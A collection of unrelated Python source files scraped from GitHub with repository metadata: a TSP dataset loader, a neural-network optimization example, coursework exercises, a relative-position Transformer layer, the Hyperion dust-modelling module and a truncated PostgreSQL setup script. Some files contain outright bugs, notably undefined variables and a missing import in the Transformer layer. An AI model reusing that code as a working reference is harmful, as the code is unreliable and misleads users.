import pickle import os import numpy as np import torch from sklearn.datasets import make_blobs from torch.utils.data import Dataset from torch.utils.data.dataset import T_co def prepare_blob_dataset(city_num: int = 50, feature_dim: int = 2, sample_num: int = 100000 ) -> (np.ndarray, np.ndarray): samples = np.zeros((sample_num, city_num, feature_dim)) labels = np.zeros((sample_num, city_num)) for sample in range(sample_num): samples[sample, :, :], labels[sample, :] = make_blobs(city_num, feature_dim, cluster_std=0.07, center_box=(0.0, 1.0)) return samples, labels class BlobDataset(Dataset): def __init__(self, city_num: int = 50, feature_dim: int = 2, sample_num: int = 100000): super(BlobDataset, self).__init__() self.city_num = city_num self.feature_dim = feature_dim self.sample_num = sample_num self.samples, self.labels = self._generate_dataset() def __getitem__(self, index) -> T_co: sample = self.samples[index] label = self.labels[index] data_pair = {'sample': sample, 'label': label} return data_pair def __len__(self): return len(self.samples) def _generate_dataset(self): samples, labels = prepare_blob_dataset(self.city_num, self.feature_dim, self.sample_num) return torch.from_numpy(samples).float(), torch.from_numpy(labels) # TSP dataset wrapper from https://github.com/wouterkool/attention-learn-to-route class TSPDataset(Dataset): def __init__(self, filename=None, size=20, num_samples=1000000, offset=0, distribution=None): super(TSPDataset, self).__init__() self.data_set = [] if filename is not None: if os.path.splitext(filename)[1] == '.npy': data = np.load(filename) assert data.ndim == (2 or 3), "data.ndim should either be 2 or 3" if data.ndim == 2: data = np.expand_dims(data, axis=0) self.data = [torch.FloatTensor(row) for row in (data[offset:offset + num_samples])] else: assert os.path.splitext(filename)[1] == '.pkl' with open(filename, 'rb') as f: data = pickle.load(f) self.data = [torch.FloatTensor(row) for row in (data[offset:offset + num_samples])] else: # Sample points randomly in [0, 1] square self.data = [torch.FloatTensor(size, 2).uniform_(0, 1) for _ in range(num_samples)] self.size = len(self.data) def __len__(self): return self.size def __getitem__(self, idx): return self.data[idx] def data_normalisation(self): self.data = [(self.data[row] - self.data[row].min()) / (self.data[row].max() - self.data[row].min()) for row in range(self.size)] if __name__ == '__main__': test = TSPDataset(filename='tmp/platforms.npy') test2 = TSPDataset(size=20, num_samples=50) print(len(test))
ma-shangao/rl_waypoint_mrta
dataset_preparation.py
dataset_preparation.py
py
3,367
python
en
code
2
github-code
36
22107437691
from blackfox import BlackFox, KerasOptimizationConfig import csv blackfox_url = 'http://localhost:50476/' bf = BlackFox(blackfox_url) input_columns = 9 input_set = [] output_set = [] with open('data/cancer_training_set.csv') as csv_file: csv_reader = csv.reader(csv_file, delimiter=',') line_count = 0 for row in csv_reader: if line_count == 0: print(f'Column names are {", ".join(row)}') else: data = list(map(float, row)) input_set.append(data[:input_columns]) output_set.append(data[input_columns:]) line_count += 1 print(f'Processed {line_count} lines.') c = KerasOptimizationConfig(validation_split=0.2) # Use CTRL + C to stop optimization (ann_io, ann_info, ann_metadata) = bf.optimize_keras_sync( input_set, output_set, config=c, network_path='data/optimized_network_cancer.onnx', network_type='onnx', integrate_scaler=True ) print('\n\nann info:') print(ann_info) print('\n\nann metadata:') print(ann_metadata)
vodena/BlackFoxPython
examples/test_optimize_sync_onnx.py
test_optimize_sync_onnx.py
py
1,040
python
en
code
1
github-code
36
2360976211
""" 【问题描述】 编写一函数insert(string, c),用于在一个已排好序(ASCII值从小到大)的字符串string(少于50个字符)中适当位置插入字符c,要求插入后串的序不变(从小到大),允许字符重复,函数返回插入后的字符串。 测试该函数:从键盘分别输入有序字符串和单个字符,然后调用insert函数,并向屏幕输出插入后的字符串。 【输入形式】 从键盘分行输入有序字符串和单个字符 【输出形式】 向屏幕输出插入后的字符串 【输入样例】 abdef c 【输出样例】 abcdef 【样例说明】 从键盘输入少于50个字符的有序字符串abdef和字符c,将字符c插入字符串abdef,并以ASCII值从小到大排序输出 """ def insert(string, c): flag = string + c result = sorted(flag) return result words = input().strip() word = input().strip() words_list = insert(words, word) for i in words_list: print(i, end = "")
xzl995/Python
CourseGrading/7.1.11插入字符.py
7.1.11插入字符.py
py
995
python
zh
code
3
github-code
36
43540671742
""" """ import numpy as np from scipy.signal import find_peaks_cwt from scipy.ndimage import gaussian_filter1d def peak_finder( curve:np.ndarray, smoothing_factor:float=21.0, )->np.ndarray: """ """ min_width = int(curve.size/20) max_width = int(curve.size/5) resolution = int((max_width - min_width)/19) peak_width = np.arange(min_width,max_width,resolution) new_curve = gaussian_filter1d(curve,sigma=smoothing_factor) indx = find_peaks_cwt(new_curve,peak_width) return indx
chriswilly/design_patterns
data_science/misc.py
misc.py
py
528
python
en
code
1
github-code
36
11249142498
import torch import copy import numpy as np from torch.nn import Dropout from torch.nn import Linear from torch.nn import LayerNorm from torch.nn import functional as F from RprMultiheadAttention import MultiheadAttention def _get_activation_fn(activation): if activation == "relu": return F.relu elif activation == "gelu": return F.gelu else: raise RuntimeError("activation should be relu/gelu, not %s." % activation) class MemTransformerEncoderLayer(torch.nn.Module): """TransformerEncoderLayer is made up of self-attn and feedforward network. This standard encoder layer is based on the paper "Attention Is All You Need". Ashish Vaswani, Noam Shazeer, Niki Parmar, Jakob Uszkoreit, Llion Jones, Aidan N Gomez, Lukasz Kaiser, and Illia Polosukhin. 2017. Attention is all you need. In Advances in Neural Information Processing Systems, pages 6000-6010. Users may modify or implement in a different way during application. Args: d_model: the number of expected features in the input (required). nhead: the number of heads in the multiheadattention models (required). dim_feedforward: the dimension of the feedforward network model (default=2048). dropout: the dropout value (default=0.1). activation: the activation function of intermediate layer, relu or gelu (default=relu). Examples:: >>> encoder_layer = nn.TransformerEncoderLayer(d_model=512, nhead=8) >>> src = torch.rand(10, 32, 512) >>> out = encoder_layer(src) """ def __init__(self, d_model, nhead, frame_len=29, dim_feedforward=2048, dropout=0.1, activation="relu"): super(MemTransformerEncoderLayer, self).__init__() self.self_attn = MultiheadAttention(d_model, nhead, dropout=dropout) # Implementation of Feedforward model self.linear1 = Linear(d_model, dim_feedforward) self.dropout = Dropout(dropout) self.linear2 = Linear(dim_feedforward, d_model) self.norm1 = LayerNorm(d_model) self.norm2 = LayerNorm(d_model) self.dropout1 = Dropout(dropout) self.dropout2 = Dropout(dropout) self.activation = _get_activation_fn(activation) # rpr encoding self.frame_len = frame_len self.k = 5 self.create_rpr_table(self.k) self.pk_embed = nn.Embedding(2*self.k + 1, d_model) self.pv_embed = nn.Embedding(2*self.k + 1, d_model) def idx_clip(x, k): return max(-k, min(k, x)) def create_rpr_table(self, k): self.rpr_table = np.zeros((self.frame_len, self.frame_len)) for i in range(1, self.frame_len + 1): for j in range(1, self.frame_len + 1): self.rpr_table[i-1, j-1] = idx_clip(j-i, k) + k return def forward(self, src, src_mask=None, src_key_padding_mask=None): r"""Pass the input through the endocder layer. Args: src: the sequnce to the encoder layer (required). src_mask: the mask for the src sequence (optional). src_key_padding_mask: the mask for the src keys per batch (optional). Shape: see the docs in Transformer class. """ src2 = self.self_attn(src, src, src, posk, posv, attn_mask=src_mask, key_padding_mask=src_key_padding_mask)[0] src = src + self.dropout1(src2) src = self.norm1(src) if hasattr(self, "activation"): src2 = self.linear2(self.dropout(self.activation(self.linear1(src)))) else: # for backward compatibility src2 = self.linear2(self.dropout(F.relu(self.linear1(src)))) src = src + self.dropout2(src2) src = self.norm2(src) return src
perathambkk/lipreading
short1.27fast_nlls_xl_2mem_lattransconv_p_OSL_500_cosine/RprTransformerEncoderLayer.py
RprTransformerEncoderLayer.py
py
3,370
python
en
code
3
github-code
36
37412068955
############################################################################## # # File format versions: # # 1: initial version # # 2: now contains reciprocal planck opacity and rosseland opacity # previous rosseland opacity was actually reciprocal planck opacity # ############################################################################## from __future__ import print_function, division import os import hashlib import h5py import numpy as np from astropy import log as logger import six from ..version import __version__ from ..util.constants import c from ..util.functions import FreezableClass from ..util.interpolate import interp1d_fast_loglog from ..util.integrate import integrate_loglog from ..util.nans import check_for_nans from .optical_properties import OpticalProperties from .emissivities import Emissivities from .mean_opacities import MeanOpacities def henyey_greenstein(mu, g, p_lin_max): P1 = (1. - g * g) / (1. + g * g - 2. * g * mu) ** 1.5 P2 = - p_lin_max * P1 * (1. - mu * mu) / (1. + mu * mu) P3 = P1 * 2. * mu / (1. + mu * mu) P4 = 0. return P1, P2, P3, P4 class SphericalDust(FreezableClass): r""" This class should be used in cases where fully arbitrary dust properties need to be specified, within the framework of randomly oriented grains, which means that the scattering phase function has the general form: .. math:: R(\theta) = \left[\begin{array}{cccc}P_1 & P_2 & 0 & 0 \\P_2 & P_1 & 0 & 0 \\0 & 0 & P_3 & -P_4 \\0 & 0 & P_4 & P_3\end{array}\right] This class is initialized with:: d = SphericalDust() and the properties should then be set manually. See `here <http://docs.hyperion-rt.org/en/stable/setup/setup_dust.html#fully-customized-4-element-dust>`_ for a description of the available properties and how to set them. """ def __init__(self, *args): self._file = None self.md5 = None self.optical_properties = OpticalProperties() self.mean_opacities = MeanOpacities() self.emissivities = Emissivities() self.set_sublimation_specific_energy('no', 0.) self._freeze() if len(args) == 0: pass elif len(args) == 1: self.read(args[0]) else: raise Exception("SphericalDust cannot take more than one argument") def hash(self): h = hashlib.md5() if self.optical_properties is None or not self.optical_properties.all_set(): h.update('none'.encode('utf-8')) else: h.update(self.optical_properties.hash().encode('utf-8')) if self.emissivities is None or not self.emissivities.all_set(): h.update('none'.encode('utf-8')) else: h.update(self.emissivities.hash().encode('utf-8')) if self.mean_opacities is None or not self.mean_opacities.all_set(): h.update('none'.encode('utf-8')) else: h.update(self.mean_opacities.hash().encode('utf-8')) import struct h.update(self.sublimation_mode.encode('utf-8')) h.update(struct.pack('>d', self.sublimation_energy)) return h.hexdigest() def set_lte_emissivities(self, n_temp=1200, temp_min=0.1, temp_max=100000.): ''' Calculate the emissivities assuming LTE Parameters ---------- n_temp : int, optional The number of temperatures to calculate the emissivities for temp_min : float, optional The minimum temperature to calculate the emissivities for temp_max : float, optional The maximum temperature to calculate the emissivities for ''' self.mean_opacities.compute(self.optical_properties, n_temp=n_temp, temp_min=temp_min, temp_max=temp_max) self.emissivities.set_lte(self.optical_properties, self.mean_opacities) def plot(self, filename): # Check that the optical properties have been set self.optical_properties.ensure_all_set() import matplotlib.pyplot as plt # Save original rc parameters rc_orig = plt.rcParams # Reset to defaults plt.rcdefaults() plt.rc('legend', fontsize=7) plt.rc('axes', titlesize='x-small') plt.rc('axes', labelsize='x-small') plt.rc('xtick', labelsize='xx-small') plt.rc('ytick', labelsize='xx-small') plt.rc('axes', linewidth=0.5) plt.rc('patch', linewidth=0.5) # Compute mean opacities if not already existent self._compute_mean_opacities() # Check that emissivities are set (before computing mean opacities) if not self.emissivities.all_set(): logger.info("Computing emissivities assuming LTE") self.emissivities.set_lte(self.optical_properties, self.mean_opacities) # Initialize figure fig = plt.figure(figsize=(10, 12)) # Plot optical properties fig = self.optical_properties.plot(fig, [421, 423, 424, 425, 426]) # Plot mean opacities fig = self.mean_opacities.plot(fig, 428) # Plot emissivities fig = self.emissivities.plot(fig, 427) # Adjust spacing between subplots fig.subplots_adjust(left=0.08, right=0.92, wspace=0.22, hspace=0.30) # Save figure fig.savefig(filename, bbox_inches='tight') # Close figure to save RAM plt.close(fig) # Restore rc parameters plt.rc(rc_orig) def set_sublimation_temperature(self, mode, temperature=0.): ''' Set the dust sublimation mode and temperature. Parameters ---------- mode : str The dust sublimation mode, which can be: * 'no' - no sublimation * 'fast' - remove all dust in cells exceeding the sublimation temperature * 'slow' - reduce the dust in cells exceeding the sublimation temperature * 'cap' - any temperature exceeding the sublimation temperature is reset to the sublimation temperature. temperature : float, optional The dust sublimation temperature, in K ''' if mode not in ['no', 'fast', 'slow', 'cap']: raise Exception("mode should be one of no/fast/slow/cap") if mode != 'no' and temperature is None: raise Exception("Need to specify a sublimation temperature") self.sublimation_mode = mode self.sublimation_energy = self.temperature2specific_energy(temperature) def set_sublimation_specific_energy(self, mode, specific_energy=0.): ''' Set the dust sublimation mode and specific energy. Parameters ---------- mode : str The dust sublimation mode, which can be: * 'no' - no sublimation * 'fast' - remove all dust in cells exceeding the sublimation specific energy * 'slow' - reduce the dust in cells exceeding the sublimation specific energy * 'cap' - any specific energy exceeding the sublimation specific energy is reset to the sublimation specific energy. specific_energy : float, optional The dust sublimation specific energy, in cgs ''' if mode not in ['no', 'fast', 'slow', 'cap']: raise Exception("mode should be one of no/fast/slow/cap") if mode != 'no' and specific_energy is None: raise Exception("Need to specify a sublimation specific_energy") self.sublimation_mode = mode self.sublimation_energy = specific_energy def _write_dust_sublimation(self, group): group.attrs['sublimation_mode'] = np.string_(self.sublimation_mode) if self.sublimation_mode in ['slow', 'fast', 'cap']: group.attrs['sublimation_specific_energy'] = self.sublimation_energy def _read_dust_sublimation(self, group): if 'sublimation_mode' in group.attrs: self.sublimation_mode = group.attrs['sublimation_mode'].decode('ascii') if self.sublimation_mode in ['slow', 'fast', 'cap']: self.sublimation_energy = group.attrs['sublimation_specific_energy'] def _compute_mean_opacities(self): if not self.mean_opacities.all_set(): self.mean_opacities.compute(self.optical_properties) def write(self, filename, compression=True): ''' Write out to a standard dust file, including calculations of the mean opacities and optionally thermal emissivities. ''' # Check that the optical properties have been set self.optical_properties.ensure_all_set() # Compute mean opacities if not already existent self._compute_mean_opacities() # Check that emissivities are set (before computing mean opacities) if not self.emissivities.all_set(): logger.info("Computing emissivities assuming LTE") self.emissivities.set_lte(self.optical_properties, self.mean_opacities) # Create dust table set if isinstance(filename, six.string_types): dt = h5py.File(filename, 'w') else: dt = filename # Add standard keywords to header dt.attrs['version'] = 2 dt.attrs['type'] = 1 dt.attrs['python_version'] = np.string_(__version__) if self.md5: dt.attrs['asciimd5'] = np.string_(self.md5) # Add optical properties and scattering angle tables self.optical_properties.to_hdf5_group(dt) # Add mean opacities table self.mean_opacities.to_hdf5_group(dt) # Add emissivities and emissivity variable tables self.emissivities.to_hdf5_group(dt) # Dust sublimation parameters self._write_dust_sublimation(dt) # Check that there are no NaN values in the file - if there are, a # warning is emitted. check_for_nans(dt) # Close dust file if isinstance(dt, h5py.File): dt.close() self._file = (filename, self.hash()) def read(self, filename): ''' Read in from a standard dust file ''' from ..util.functions import asstr if isinstance(filename, six.string_types): # Check file exists if not os.path.exists(filename): raise Exception("File not found: %s" % filename) # Read in dust table set dt = h5py.File(filename, 'r') close = True else: # Read in dust table set dt = filename close = False # Check version and type if dt.attrs['version'] not in [1, 2]: raise Exception("Version should be 1 or 2") if dt.attrs['type'] != 1: raise Exception("Type should be 1") if 'asciimd5' in dt.attrs: self.md5 = asstr(dt.attrs['asciimd5']) else: self.md5 = None # Read in the optical properties self.optical_properties.from_hdf5_group(dt) # Read in the planck and rosseland mean opacities if dt.attrs['version'] == 1: logger.warning("Version 1 dust file detected - discarding mean opacities and recomputing them") self.mean_opacities.compute(self.optical_properties) else: self.mean_opacities.from_hdf5_group(dt) # Read in emissivities self.emissivities.from_hdf5_group(dt) # Dust sublimation parameters self._read_dust_sublimation(dt) # Close file object if needed if close: dt.close() self._file = (filename, self.hash()) def chi_nu_temperature(self, temperature): """ Compute the mean opacity to extinction for a blackbody at a given temperature. Parameters ---------- temperature : float The temperature of the blackbody to use Returns ------- chi_nu_mean : float The mean opacity to extinction """ self._compute_mean_opacities() return interp1d_fast_loglog(self.mean_opacities.temperature, self.mean_opacities.chi_planck, temperature, bounds_error=True) def kappa_nu_temperature(self, temperature): """ Compute the mean opacity to absorption for a blackbody at a given temperature. Parameters ---------- temperature : float The temperature of the blackbody to use Returns ------- kappa_nu_mean : float The mean opacity to absorption """ self._compute_mean_opacities() return interp1d_fast_loglog(self.mean_opacities.temperature, self.mean_opacities.kappa_planck, temperature, bounds_error=True) def chi_nu_spectrum(self, nu, fnu): """ Compute the mean opacity to extinction for a given spectrum. Parameters ---------- nu : array_like The frequencies, in Hz fnu : array_like The monochromatic fluxes per unit frequency. Units are unimportant since proportionality constants are cancelled out in the computation. Returns ------- chi_nu_mean : float The mean opacity to extinction """ if nu.max() > self.optical_properties.nu.max() or nu.min() < self.optical_properties.nu.min(): raise Exception("Opacity to extinction is not defined at all " "spectrum frequencies") chi_nu = self.optical_properties.interp_chi_nu(nu) return (integrate_loglog(nu, fnu * chi_nu) / integrate_loglog(nu, fnu)) def kappa_nu_spectrum(self, nu, fnu): """ Compute the mean opacity to absorption for a given spectrum. Parameters ---------- nu : array_like The frequencies, in Hz fnu : array_like The monochromatic fluxes per unit frequency. Units are unimportant since proportionality constants are cancelled out in the computation. Returns ------- kappa_nu_mean : float The mean opacity to absorption """ if nu.max() > self.optical_properties.nu.max() or nu.min() < self.optical_properties.nu.min(): raise Exception("Opacity to absorption is not defined at all " "spectrum frequencies") kappa_nu = self.optical_properties.interp_kappa_nu(nu) return (integrate_loglog(nu, fnu * kappa_nu) / integrate_loglog(nu, fnu)) def temperature2specific_energy(self, temperature): """ Convert a temperature to its corresponding specific energy value. Parameters ---------- temperature : float or array_like The temperature to convert Returns ------- specific_energy : float or array_like The specific energy corresponding to the input temperature """ self._compute_mean_opacities() specific_energy = interp1d_fast_loglog(self.mean_opacities.temperature, self.mean_opacities.specific_energy, temperature, bounds_error=False, fill_value=np.nan) if np.isscalar(temperature): if temperature < self.mean_opacities.temperature[0]: specific_energy = self.mean_opacities.specific_energy[0] elif temperature > self.mean_opacities.temperature[-1]: specific_energy = self.mean_opacities.specific_energy[-1] else: specific_energy[temperature < self.mean_opacities.temperature[0]] = self.mean_opacities.specific_energy[0] specific_energy[temperature > self.mean_opacities.temperature[-1]] = self.mean_opacities.specific_energy[-1] return specific_energy def specific_energy2temperature(self, specific_energy): """ Convert a specific energy value to its corresponding temperature. Parameters ---------- specific_energy : float or array_like The specific energy to convert Returns ------- temperature : float or array_like The temperature corresponding to the input specific energy """ self._compute_mean_opacities() temperature = interp1d_fast_loglog(self.mean_opacities.specific_energy, self.mean_opacities.temperature, specific_energy, bounds_error=False, fill_value=np.nan) if np.isscalar(specific_energy): if specific_energy < self.mean_opacities.specific_energy[0]: temperature = self.mean_opacities.temperature[0] elif specific_energy > self.mean_opacities.specific_energy[-1]: temperature = self.mean_opacities.temperature[-1] else: temperature[specific_energy < self.mean_opacities.specific_energy[0]] = self.mean_opacities.temperature[0] temperature[specific_energy > self.mean_opacities.specific_energy[-1]] = self.mean_opacities.temperature[-1] return temperature class IsotropicDust(SphericalDust): """ This class should be used for dust properties that include isotropic scattering. The dust properties should be instatiated as:: d = IsotropicDust(nu, albedo, chi) where ``nu``, ``albedo``, and ``chi`` are 1-D Numpy arrays containing the frequencies, albedo, and opacity to extinction respectively. """ def __init__(self, nu, albedo, chi): SphericalDust.__init__(self) # Set cos(theta) grid for computing the scattering matrix elements self.optical_properties.mu = np.linspace(-1., 1., 2) # Set optical properties self.optical_properties.nu = nu self.optical_properties.albedo = albedo self.optical_properties.chi = chi # Compute scattering matrix elements self.optical_properties.initialize_scattering_matrix() # Set scattering matrix to isotropic values self.optical_properties.P1[:, :] = 1. self.optical_properties.P2[:, :] = 0. self.optical_properties.P3[:, :] = 1. self.optical_properties.P4[:, :] = 0. # Sort optical properties self.optical_properties._sort() class HenyeyGreensteinDust(SphericalDust): """ This class should be used for dust properties that include scattering parameterized by the `Henyey-Greenstein, 1941 <http://dx.doi.org/10.1086/144246>`_ function. The dust properties should be instatiated as:: d = HenyeyGreensteinDust(nu, albedo, chi, g, p_lin_max) where ``nu``, ``albedo``, and ``chi`` are 1-D Numpy arrays containing the frequencies, albedo, and opacity to extinction respectively, and ``g`` and ``p_lin_max`` are also 1-D Numpy arrays containing the asymmetry parameter and the maximum linear polarization. """ def __init__(self, nu, albedo, chi, g, p_lin_max): SphericalDust.__init__(self) # Set cos(theta) grid for computing the scattering matrix elements n_mu = 100 self.optical_properties.mu = np.linspace(-1., 1., n_mu) # Set optical properties self.optical_properties.nu = nu self.optical_properties.albedo = albedo self.optical_properties.chi = chi # Compute scattering matrix elements self.optical_properties.initialize_scattering_matrix() for i in range(n_mu): self.optical_properties.P1[:, i], \ self.optical_properties.P2[:, i], \ self.optical_properties.P3[:, i], \ self.optical_properties.P4[:, i] = henyey_greenstein(self.optical_properties.mu[i], g, p_lin_max) class HOCHUNKDust(HenyeyGreensteinDust): """ This class should be used for dust properties that include scattering parameterized by the `Henyey-Greenstein, 1941 <http://dx.doi.org/10.1086/144246>`_ function, which are formatted for the `HOCHUNK code <http://gemelli.colorado.edu/~bwhitney/codes/>`_. The dust properties should be instatiated as:: d = HOCHUNKDust(filename) where ``filename`` is the name of the file containing the dust properties in the HOCHUNK format. """ def __init__(self, filename): # Read in dust file dustfile = np.loadtxt(filename, dtype=[('wav', float), ('c_ext', float), ('c_sca', float), ('chi', float), ('g', float), ('p_lin_max', float)], usecols=[0, 1, 2, 3, 4, 5]) # Ensure file is ordered in increasing frequency if dustfile['wav'][-1] > dustfile['wav'][0]: dustfile = dustfile[::-1] # Compute frequency and albedo nu = c / dustfile['wav'] * 1.e4 albedo = dustfile['c_sca'] / dustfile['c_ext'] self.md5 = hashlib.md5(open(filename, 'rb').read()).hexdigest() HenyeyGreensteinDust.__init__(self, nu, albedo, dustfile['chi'], dustfile['g'], dustfile['p_lin_max']) TTsreDust = HOCHUNKDust class CoatsphSingle(SphericalDust): def __init__(self, directory, size, density): ''' Initialize single-component dust. Parameters ---------- directory : str Directory containing all the files describing the dust size : float Grain size, in cm density : float Dust grain density, in g/cm^3 ''' SphericalDust.__init__(self) f = open('%s/coatsph_forw.dat' % directory, 'rb') version = f.readline() n_components = int(f.readline().strip().split()[5]) # Read in main dust file dustfile = np.loadtxt(f, skiprows=3, dtype=[('x', float), ('radius', float), ('wav', float), ('q_ext', float), ('q_sca', float), ('q_back', float), ('g', float)]) n_wav = len(dustfile) self.optical_properties.nu = c / dustfile['wav'] * 1.e4 self.optical_properties.albedo = dustfile['q_sca'] / dustfile['q_ext'] self.optical_properties.chi = 0.75 * dustfile['q_ext'] / size / density # Read in scattering matrix elements for i in range(n_wav): filename = '%s/coatsph_scat_%04i_0001.dat' % (directory, i + 1) phasefile = np.loadtxt(filename, skiprows=9, dtype=[('theta', float), ('s11', float), ('polariz', float), ('s12', float), ('s33', float), ('s34', float)]) if i == 0: self.optical_properties.mu = np.cos(np.radians(phasefile['theta'])) self.optical_properties.initialize_scattering_matrix() self.optical_properties.P1[i, :] = phasefile['s11'] self.optical_properties.P2[i, :] = phasefile['s12'] self.optical_properties.P3[i, :] = phasefile['s33'] self.optical_properties.P4[i, :] = phasefile['s34'] class CoatsphMultiple(SphericalDust): def __init__(self, directory): ''' Initialize multi-component dust. Parameters ---------- directory : str Directory containing all the files describing the dust ''' SphericalDust.__init__(self) f = open('%s/coatsph_forw.dat' % directory, 'rb') version = f.readline() n_components = int(f.readline().strip().split()[5]) # Read in main dust file dustfile = np.loadtxt(f, skiprows=7, dtype=[('wav', float), ('c_ext', float), ('c_sca', float), ('chi', float), ('g', float), ('pmax', float), ('thetmax', float)]) n_wav = len(dustfile) self.optical_properties.nu = c / dustfile['wav'] * 1.e4 self.optical_properties.albedo = dustfile['c_sca'] / dustfile['c_ext'] self.optical_properties.chi = dustfile['chi'] # Read in scattering matrix elements for i in range(n_wav): filename = '%s/coatsph_scat.%04i.dat' % (directory, i + 1) phasefile = np.loadtxt(filename, skiprows=7, dtype=[('theta', float), ('s11', float), ('polariz', float), ('s12', float), ('s33', float), ('s34', float)]) if i == 0: self.optical_properties.mu = np.cos(np.radians(phasefile['theta'])) self.optical_properties.initialize_scattering_matrix() self.optical_properties.P1[i, :] = phasefile['s11'] self.optical_properties.P2[i, :] = phasefile['s12'] self.optical_properties.P3[i, :] = phasefile['s33'] self.optical_properties.P4[i, :] = phasefile['s34'] class MieXDust(SphericalDust): def __init__(self, model): SphericalDust.__init__(self) wav = np.loadtxt('%s.alb' % model, usecols=[0]) self.optical_properties.albedo = np.loadtxt('%s.alb' % model, usecols=[1]) kappa = np.loadtxt('%s.k_abs' % model, usecols=[1]) self.optical_properties.chi = kappa / (1 - self.optical_properties.albedo) # Check for NaN values for quantity in ['chi', 'albedo']: values = self.optical_properties.__dict__[quantity] if np.any(np.isnan(values)): logger.warning("NaN values found inside MieX %s file - interpolating" % quantity) invalid = np.isnan(values) values[invalid] = interp1d_fast_loglog(wav[~invalid], values[~invalid], wav[invalid]) if np.any(np.isnan(values)): raise Exception("Did not manage to fix NaN values in MieX %s" % quantity) self.optical_properties.nu = c / wav * 1.e4 n_wav = len(wav) n_mu = (len(open('%s.f11' % model).readlines()) // n_wav) - 1 mu = np.zeros(n_mu) # Read mu f11 = open('%s.f11' % model) f11.readline() f11.readline() for i in range(n_mu): mu[i] = np.cos(np.radians(float(f11.readline().split()[0]))) f11.close() self.optical_properties.mu = mu[::-1] # Read in matrix elements self.optical_properties.initialize_scattering_matrix() f11 = open('%s.f11' % model) f12 = open('%s.f12' % model) f33 = open('%s.f33' % model) f34 = open('%s.f34' % model) f11.readline() f12.readline() f33.readline() f34.readline() for j in range(n_wav): if float(f11.readline()) != wav[j]: raise Exception("Incorrect wavelength in f11") if float(f12.readline()) != wav[j]: raise Exception("Incorrect wavelength in f12") if float(f33.readline()) != wav[j]: raise Exception("Incorrect wavelength in f33") if float(f34.readline()) != wav[j]: raise Exception("Incorrect wavelength in f34") for i in range(n_mu): self.optical_properties.P1[j, n_mu - i - 1] = float(f11.readline().split()[1]) self.optical_properties.P2[j, n_mu - i - 1] = float(f12.readline().split()[1]) self.optical_properties.P3[j, n_mu - i - 1] = float(f33.readline().split()[1]) self.optical_properties.P4[j, n_mu - i - 1] = float(f34.readline().split()[1]) for i in range(n_mu): for quantity in ['P1', 'P2', 'P3', 'P4']: values = self.optical_properties.__dict__[quantity] if np.any(np.isnan(values[:, i])): logger.warning("NaN values found inside MieX %s file - interpolating" % quantity) invalid = np.isnan(values[:, i]) values[:, i][invalid] = interp1d_fast_loglog(wav[~invalid], values[:, i][~invalid], wav[invalid]) if np.any(np.isnan(values[:, i])): raise Exception("Did not manage to fix NaN values in MieX %s" % quantity) class BHDust(SphericalDust): """ This class should be used for dust properties that were computed using `this dust calculation code <https://github.com/hyperion-rt/bhmie>`_ which is a wrapper to the ``bhmie`` routine originally written by C.F. Bohren and D. Huffman and improved by B. Draine. When using the ``bhmie`` code, you should set the output format to ``2``, which will create a number of files ending in ``.wav``, ``.mu``, ``.alb``, etc. Then, instantiate this class with the name of the directory containing these output files along with the prefix used. For example, if you use ``directory/mydust`` as a prefix in ``bhmie``, you can import this dust with:: >>> from hyperion.dust import BHDust >>> d = BHDust('directory/mydust') """ def __init__(self, model): SphericalDust.__init__(self) mu = np.loadtxt('%s.mu' % model) nu = c / np.loadtxt('%s.wav' % model) * 1.e4 albedo = np.loadtxt('%s.alb' % model) chi = np.loadtxt('%s.chi' % model) P1 = np.loadtxt('%s.f11' % model) P2 = np.loadtxt('%s.f12' % model) P3 = np.loadtxt('%s.f33' % model) P4 = np.loadtxt('%s.f34' % model) if nu[-1] < nu[0]: nu = nu[::-1] albedo = albedo[::-1] chi = chi[::-1] P1 = P1[::-1, :] P2 = P2[::-1, :] P3 = P3[::-1, :] P4 = P4[::-1, :] if mu[-1] < mu[0]: mu = mu[::-1] P1 = P1[:, ::-1] P2 = P2[:, ::-1] P3 = P3[:, ::-1] P4 = P4[:, ::-1] self.optical_properties.mu = mu self.optical_properties.nu = nu self.optical_properties.albedo = albedo self.optical_properties.chi = chi self.optical_properties.P1 = P1 self.optical_properties.P2 = P2 self.optical_properties.P3 = P3 self.optical_properties.P4 = P4
hyperion-rt/hyperion
hyperion/dust/dust_type.py
dust_type.py
py
31,342
python
en
code
51
github-code
36
71592645224
matrix_A = [ [2,0], [3,0]] matrix_B = [ [1,0], [1,2]] rows_A = len(matrix_A) columns_A = len(matrix_A[0]) rows_B = len (matrix_B) columns_B = len(matrix_B[0]) print(f' m: {rows_A}') print(f' n: {columns_A}') print(f' r: {columns_B}') matrix_C = [[0 for row in range(rows_A)] for columns in range(columns_B)] print(matrix_C) if __name__ == '__main__': aux = 0 if columns_A == rows_B: for i in range(columns_B): for j in range(rows_A): for k in range(columns_A): matrix_C[i][j] += (matrix_A[i][k] * matrix_B[k][j]) print(matrix_C) else: print('No se puede muliplicar')
Gabospa/Matrix
multiplication.py
multiplication.py
py
688
python
en
code
1
github-code
36
42985186741
import psycopg2 def create_table(connection): # il cursore è utillizato esequire comandi e accedere alla risposta cursor = connection.cursor() try: # prepara il comando create_table_query = '''CREATE TABLE students (ID SERIAL PRIMARY KEY , NAME TEXT NOT NULL, SURNAME TEXT NOT NULL, unique(NAME,SURNAME)); ''' # eseguo il comando cursor.execute(create_table_query) create_table_query = '''CREATE TABLE courses (ID SERIAL PRIMARY KEY , NAME TEXT NOT NULL, DESCR TEXT NOT NULL); ''' cursor.execute(create_table_query) create_table_query = '''CREATE TABLE booking (STUDENT_ID BIGINT , COURSE_ID BIGINT , PRIMARY KEY (STUDENT_ID,COURSE_ID), FOREIGN KEY (STUDENT_ID) REFERENCES students(ID) MATCH FULL ON DELETE CASCADE, FOREIGN KEY (COURSE_ID) REFERENCES courses(ID) MATCH FULL ON DELETE CASCADE ); ''' cursor.execute(create_table_query) # le modifiche diventano definitive connection.commit() except (Exception, psycopg2.Error) as error: print("Error creating tables", error) finally: # chiudo il cursore in finally cursor.close() def insert_names(connection): cursor = connection.cursor() try: nomi = [("Marco", "Torlaschi"), ("Roberta", "Latini"), ("Giorgo", "Franzini")] # preparo il comando generico con %s e poi inserisco valori in all'esecuzione insert = "INSERT INTO students (NAME,SURNAME) VALUES (%s,%s)" for n in nomi: cursor.execute(insert, n) connection.commit() except (Exception, psycopg2.Error) as error: print("Error inserting names", error) finally: cursor.close() def insert_courses(connection): cursor = connection.cursor() try: corsi = [("SQL", "corso sql"), ("SPRING", "corso spring")] insert = "INSERT INTO courses (NAME,DESCR) VALUES (%s,%s)" for n in corsi: 